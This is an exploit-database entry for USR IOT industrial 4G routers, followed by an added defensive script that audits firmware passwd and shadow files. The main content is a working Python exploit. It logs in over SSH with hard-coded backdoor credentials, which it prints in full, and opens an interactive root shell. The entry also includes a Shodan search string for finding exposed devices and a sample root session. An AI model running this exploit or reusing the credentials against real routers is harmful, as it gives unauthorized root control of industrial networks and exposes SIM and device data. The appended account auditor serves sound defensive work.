USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 – Remote Root Backdoor

  • Author: LiquidWorm
    Date: 2022-05-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50894/
  • # Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
    # Exploit Author: LiquidWorm
    
    #!/usr/bin/env python3
    #
    #
    # USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
    #
    #
    # Vendor: Jinan USR IOT Technology Limited
    # Product web page: https://www.pusr.com | https://www.usriot.com
    # Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
    # 1.2.7 (USR-LG220-L)
    #
    # Summary: USR-G806 is an industrial 4G wireless LTE router which provides
    # a solution for users to connect their own device to a 4G network via WiFi interface
    # or Ethernet interface. USR-G806 adopts high performance embedded CPU which
    # can support 580MHz working frequency and can be widely used in Smart Grid,
    # Smart Home, public bus and Vending machine for data transmission at high
    # speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
    # flow control and has many advantages including high reliability, simple
    # operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
    # WLAN interface, 4G interface. USR-G806 provides various networking modes
    # to help users establish their own network.
    #
    # Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
    # within its Linux distribution image. These sets of credentials are never
    # exposed to the end-user and cannot be changed through any normal operation
    # of the device. The 'usr' account with password 'www.usr.cn' has the highest
    # privileges on the device. The password is also the default WLAN password.
    # Shodan Dork: title:"usr-*"// 4,648 ed ao 15042022
    #
    # -------------------------------------------------------------------------
    # lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
    #
    # --Got rewt!
    # # id;id root;pwd
    # uid=0(usr) gid=0(usr)
    # uid=2(root) gid=2(root) groups=2(root)
    # /root
    # # crontab -l
    # */2 * * * * /etc/ltedial
    # */20 * * * * /etc/init.d/Net_4G_Check.sh
    # */15 * * * * /etc/test_log.sh
    # */120 * * * * /etc/pddns/pddns_start.sh start &
    # 44 4 * * * /etc/init.d/sysreboot.sh &
    # */5 * * * * ps | grep "/usr/sbin/ntpd"&& /etc/init.d/sysntpd stop;
    # 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
    # cat /tmp/usrlte_info
    # Local time is Fri Apr 15 05:38:56 2022
    # (loop)
    # IMEI Number:8*************1
    # Operator information:********Telecom
    # signal intensity:normal(20)
    #
    # Software version number:E*****************G
    # SIM Card CIMI number:4*************7
    # SIM Card number:8******************6
    # Short message service center number:"+8**********1"
    # system information:4G Mode
    # PDP protocol:"IPV4V6"
    # CREG:register
    # Check ME password:READY
    # base station information:"4**D","7*****B"
    # cat /tmp/usrlte_info_imsi
    # 4*************7
    # # exit
    #
    # lqwrm@metalgear:~$ 
    # -------------------------------------------------------------------------
    #
    # Tested on: GNU/Linux 3.10.14 (mips)
    # OpenWrt/Linaro GCC 4.8-2014.04
    # Ralink SoC MT7628 PCIe RC mode
    # BusyBox v1.22.1
    # uhttpd
    # Lua
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # @zeroscience
    #
    #
    # Advisory ID: ZSL-2022-5705
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
    #
    #
    # 10.04.2022
    #
    
    
    import paramiko as bah
    import sys as baaaaaah
    
    bnr='''
    ▄• ▄▌.▄▄ · ▄▄▄▪▄▄▄▄▄
    █▪██▌▐█ ▀. ▀▄ █·██ ▪ •██
    █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄▐█.▪
    ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·
    ▄▄▄▄·▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀▄▄▄
    ▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █·
    ▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄▄█▀▄ ▐▀▀▄ 
    ██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌
    ·▀▀▀▀▀▀ ▄▄▄▀ ·▀▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀▀
    ▀▄ █·▪ ▪ •██
    ▐▀▀▄▄█▀▄▄█▀▄▐█.▪
    ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·
     ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·
    ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.
    ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄ 
    ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█ 
     ▀▀ ·▀▀▀ ·▀▀▀▀▀▀▀▀▀▀▀▀▀▀
    '''
    print(bnr)
    
    if len(baaaaaah.argv)<2:
        print('--Gief me an IP.')
        exit(0)
    
    adrs=baaaaaah.argv[1]
    unme='usr'
    pwrd='www.usr.cn'
    
    rsh=bah.SSHClient()
    rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
    try:
        rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
        print('--Got rewt!')
    except:
        print('--Backdoor removed.')
        exit(-1)
    
    while True:
        cmnd=input('# ')
        if cmnd=='exit':
            rsh.exec_command('exit')
            break
        stdin,stdout,stderr = rsh.exec_command(cmnd)
        print(stdout.read().decode().strip())
    
    rsh.close()
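The defect the advisory describes is visible in the firmware image itself: the `id` output above shows an account named `usr` with UID 0 and a usable password, while the account named `root` has UID 2. The following Python is an added defensive example (not part of the advisory, the exploit, or the vendor's firmware) that audits `/etc/passwd` and `/etc/shadow` from an unpacked firmware root filesystem for exactly that pattern. The sample file contents are constructed to mirror the advisory's `id` output, and the hash strings are placeholders rather than real hashes; the field layout assumed is the standard seven-field passwd and nine-field shadow format.

```python
# Added example, not part of the original advisory or the vendor's firmware:
# audit /etc/passwd and /etc/shadow taken from an unpacked firmware root
# filesystem for hard-coded privileged accounts. The sample contents below are
# constructed to mirror the advisory's `id` output (usr has UID 0, root has
# UID 2); the hash strings are placeholders, not real hashes.
from dataclasses import dataclass

NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}

# Constructed sample files (placeholder hashes).
SAMPLE_PASSWD = """\
root:x:2:2:root:/root:/bin/ash
usr:x:0:0:usr:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
"""

SAMPLE_SHADOW = """\
root:$1$PLACEHOLDER$rootplaceholderhash:0:0:99999:7:::
usr:$1$PLACEHOLDER$usrplaceholderhash:0:0:99999:7:::
daemon:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
"""


@dataclass(frozen=True)
class Finding:
    user: str
    uid: int
    reason: str


def parse_passwd(text):
    """Map user name -> (uid, gid, login shell) from /etc/passwd content."""
    users = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:          # skip blank or malformed lines
            continue
        name, _pw, uid, gid, _gecos, _home, shell = fields
        users[name] = (int(uid), int(gid), shell)
    return users


def parse_shadow(text):
    """Map user name -> password hash field from /etc/shadow content."""
    hashes = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 2:
            continue
        hashes[fields[0]] = fields[1]
    return hashes


def audit_accounts(passwd_text, shadow_text):
    """Flag accounts that look like a hidden privileged login."""
    users = parse_passwd(passwd_text)
    hashes = parse_shadow(shadow_text)
    findings = []
    for name, (uid, _gid, shell) in users.items():
        pw_hash = hashes.get(name, "")
        locked = pw_hash.startswith(("!", "*"))
        # An empty hash field means no password is required at all, so it
        # still counts as a usable login.
        can_login = not locked and shell not in NOLOGIN_SHELLS
        if uid == 0 and name != "root":
            findings.append(Finding(name, uid, "uid 0 account not named root"))
        if uid == 0 and can_login:
            findings.append(Finding(name, uid, "uid 0 account with usable password and login shell"))
        if name == "root" and uid != 0:
            findings.append(Finding(name, uid, "account named root does not have uid 0"))
    return findings


if __name__ == "__main__":
    for f in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{f.user} (uid {f.uid}): {f.reason}")
```

On a real image, read the two files out of the unpacked root filesystem (for an OpenWrt-style image, the squashfs root) and pass their contents to `audit_accounts`; any UID 0 account that is not `root`, or a `root` account demoted to another UID, is worth a closer look regardless of whether its password is known.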